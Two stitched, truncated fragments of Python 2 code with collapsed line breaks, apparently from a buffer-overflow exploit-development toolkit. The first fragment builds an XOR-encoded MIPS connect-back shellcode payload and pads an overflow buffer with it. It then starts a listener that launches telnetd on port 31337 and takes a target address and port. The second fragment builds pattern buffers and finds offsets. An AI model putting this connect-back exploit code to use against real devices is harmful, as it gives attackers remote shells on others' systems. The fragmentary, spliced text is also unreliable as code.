#connectback_server=ConnectbackServer(connectback_host,startcmd="/usr/sbin/telnetd -p 31337",connectback_shell=False) payload=CallbackPayload(connectback_host,LittleEndian) encoded_payload=MipsXorEncoder(payload,LittleEndian,badchars=badchars) buf.add_pattern(700-buf.len()) buf.add_string(encoded_payload.shellcode, description="encoded connect back payload") if len(sys.argv) == 2: search_value=sys.argv[1] offset=buf.find_offset(search_value) if(offset < 0): print "Couldn't find string %s in the overflow buffer." % search_string else: print "Found string %s at\noffset: %d" % (search_string,offset) exit(0) pid=None pid=connectback_server.serve_connectback() time.sleep(1) if pid and pid > 0: try: addr=sys.argv[1] port=int(sys.argv[2])
from crossbow.overflow_development.overflowbuilder import EmptyOverflowBuffer from crossbow.common.support import BigEndian from crossbow.common.support import Logging logger=Logging() logger.LOG_INFO("Creating empty overflow buffer") buf=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6']) buf.add_pattern(1024) logger.LOG_INFO("Length of empty overflow buffer: %d" % buf.len()) buf.print_section_descriptions() print buf.pretty_string() logger.LOG_INFO("Offet of \"u3Au4\": %d" % buf.find_offset("u3Au4")) logger.LOG_INFO("Creating second emtpy overflow buffer") buf2=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6']) try: buf2.add_pattern(128) except Exception as e: logger.LOG_WARN("Failed to add section.") logger.LOG_WARN(str(e)) try: buf2.add_string('A'*128)